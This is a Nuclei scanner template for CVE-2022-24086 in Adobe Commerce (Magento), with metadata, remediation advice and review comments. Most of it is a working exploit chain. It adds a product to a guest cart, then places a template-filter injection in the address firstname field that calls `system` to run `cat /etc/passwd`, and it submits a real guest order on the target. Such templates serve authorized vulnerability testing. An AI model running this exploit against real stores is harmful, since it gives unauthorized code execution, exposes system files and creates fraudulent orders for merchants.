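id: CVE-2022-24086

info:
  name: Adobe Commerce (Magento) - Remote Code Execution
  author: daffainfo
  severity: critical
  description: |
    Adobe Commerce versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier) are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrary code execution.
  impact: |
    Attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Apply the fix from Adobe's APSB22-12 advisory (referenced below) or upgrade to a release newer than the affected ranges (2.4.3-p1 and 2.3.7-p2 and earlier). Re-check the advisory for any follow-up patches before considering the store remediated.
  reference:
    - https://helpx.adobe.com/security/products/magento/apsb22-12.html
    - https://vovohelo.medium.com/reversing-a-magento-rce-cve-2022-24086-e991ead4d8af
    - https://labs.watchtowr.com/adobe-commerce-magento-rce-cve-2022-24086/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24086
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24086
    epss-score: 0.93696
    epss-percentile: 0.99856
    cwe-id: CWE-20
    cpe: cpe:2.3:a:adobe:commerce:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: adobe
    product: commerce
    shodan-query: "X-Magento-Tags"
  # "intrusive" is not a formality here: the template is a working exploit, not a
  # version probe. It adds a product to a guest cart, then sends a checkout payload
  # whose firstname field abuses Magento's template filter to run an OS command
  # (cat /etc/passwd) on the server, and finally POSTs payment-information with the
  # "checkmo" method, which attempts to place a real guest order (random email,
  # address and phone) in the merchant's back office. Run only with explicit
  # authorization and expect to clean up the resulting order/quote records.
  tags: cve,cve2022,adobe,magento,commerce,rce,intrusive,kev,vkev

# Randomised checkout fields so repeated runs do not collide on identical guest data.
variables:
  random_str: '{{rand_base(5, "abc")}}'
  email: '{{randstr}}@{{rand_base(5)}}.com'
  telephone: "{{rand_int(10000, 99999)}}"

# Strictly sequential: each request depends on values extracted by the previous one
# (form_key and product_id from 1, cart entity_id from 3). A failed internal matcher
# stops the chain rather than firing a false positive.
flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  # 1. Fingerprint the storefront and harvest the CSRF form_key plus a product id.
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(to_lower(body), "x-magento", "form_key")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: form_key
        part: body
        group: 1
        regex:
          - 'name="form_key"\s+type="hidden"\s+value="([0-9a-zA-Z]+)"'
        internal: true

      # NOTE(review): {{product_id}} is consumed by the add-to-cart request below but was
      # never extracted or declared in the original template, so request 2 fails nuclei's
      # unresolved-variable check before anything is sent. This pulls the first product id
      # rendered on the landing page — assumes the storefront exposes data-product-id on
      # its listings (confirm against the target); otherwise supply it with
      # -var product_id=<id>. The product must be addable without required options for
      # the multipart add-to-cart in step 2 to succeed.
      - type: regex
        name: product_id
        part: body
        group: 1
        regex:
          - 'data-product-id="([0-9]+)"'
        internal: true

  # 2. Add the product to a guest cart so a quote (and later a cart mask id) exists.
  - raw:
      - |
        POST /checkout/cart/add/uenc/{{base64(BaseURL)}}%2C/product/{{product_id}}/ HTTP/1.1
        Host: {{Hostname}}
        Cookie: form_key={{form_key}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2gMM6E6ZIRMtnlg4

        ------WebKitFormBoundary2gMM6E6ZIRMtnlg4
        Content-Disposition: form-data; name="product"

        {{product_id}}
        ------WebKitFormBoundary2gMM6E6ZIRMtnlg4
        Content-Disposition: form-data; name="item"

        {{product_id}}
        ------WebKitFormBoundary2gMM6E6ZIRMtnlg4
        Content-Disposition: form-data; name="form_key"

        {{form_key}}
        ------WebKitFormBoundary2gMM6E6ZIRMtnlg4--

    matchers:
      - type: dsl
        dsl:
          - contains(content_type, "application/json")
          - 'status_code == 200'
        condition: and
        internal: true

  # 3. Load the checkout page; its embedded quote JSON carries the guest cart's
  #    masked entity_id, which the REST guest-cart endpoints key on.
  - raw:
      - |
        GET /checkout HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(to_lower(body), "entity_id", "store_id", "formkey")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: entity_id
        part: body
        group: 1
        regex:
          - '"entity_id":"([0-9a-zA-Z]+)","store'
        internal: true

  # 4. Set shipping/billing addresses. The firstname field carries the template-filter
  #    payload: the first {{var ...}} primes the filter, the second registers `system`
  #    as an after-filter callback so the filtered text is executed as a shell command.
  #    $IFS stands in for the space Magento strips from the value.
  #    Assumes the store ships to FR via the "flatrate" carrier; if it does not, the
  #    response lacks payment_methods/totals and the chain stops here.
  - raw:
      - |
        POST /rest/default/V1/guest-carts/{{entity_id}}/shipping-information HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"addressInformation":{"shipping_address":{"countryId":"FR","regionCode":"","region":"","street":["{{random_str}}"],"company":"","telephone":"{{telephone}}","postcode":"12311","city":"{{random_str}}","firstname":"{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cat$IFS/etc/passwd)}}","lastname":"{{random_str}}"},"billing_address":{"countryId":"FR","regionCode":"","region":"","street":["{{random_str}}"],"company":"","telephone":"{{telephone}}","postcode":"12311","city":"{{random_str}}","firstname":"{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cat$IFS/etc/passwd)}}","lastname":"{{random_str}}","saveInAddressBook":null},"shipping_method_code":"flatrate","shipping_carrier_code":"flatrate","extension_attributes":{}}}

    # Required: the {{var ...}} sequences above are Magento directives, not nuclei
    # variables, and would otherwise be rejected as unresolved.
    skip-variables-check: true

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "payment_methods", "totals")'
          - 'status_code == 200'
        condition: and
        internal: true

  # 5. Submit payment-information with the offline "checkmo" method. This is the step
  #    that triggers template rendering of the stored address, executing the payload,
  #    and it also attempts to place the guest order on the target.
  - raw:
      - |
        POST /rest/default/V1/guest-carts/{{entity_id}}/payment-information HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"cartId":"{{entity_id}}","billingAddress":{"countryId":"FR","regionCode":"","region":"","street":["{{random_str}}"],"company":"","telephone":"{{telephone}}","postcode":"12311","city":"{{random_str}}","firstname":"{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cat$IFS/etc/passwd)}}","lastname":"{{random_str}}","saveInAddressBook":null},"paymentMethod":{"method":"checkmo","po_number":null,"additional_data":null},"email":"{{email}}"}

    # Same reason as above: the Magento {{var ...}} directives must not be expanded by nuclei.
    skip-variables-check: true

    # Positive result only when the command output (an /etc/passwd root entry) is
    # reflected in the response — i.e. command execution is confirmed, not inferred.
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# NOTE(review): this digest was computed over the unmodified template; after any edit it
# no longer verifies and the template will be treated as unsigned. Re-sign
# (nuclei -sign) before distributing.
# digest: 490a0046304402200fb52680117a3666823a5acfdd29e85df9991a9034a72865c4d6155519d2258202204ccd552480a5616498fe628c12a50347a4c06fd87073bf2a27ab4c7bfc3a09ba:922c64590222798bb761d5b6d8e72950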